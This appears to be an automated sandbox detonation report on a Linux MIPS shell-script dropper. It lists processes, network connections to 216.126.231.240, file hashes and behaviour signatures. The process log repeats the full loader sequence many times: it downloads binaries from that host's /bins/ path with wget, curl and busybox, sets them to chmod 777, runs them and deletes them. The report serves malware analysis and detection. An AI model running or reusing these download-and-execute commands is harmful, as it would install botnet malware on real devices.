[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
debian9-mipsel-20240611-en
Max time kernel
104s
Max time network
134s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
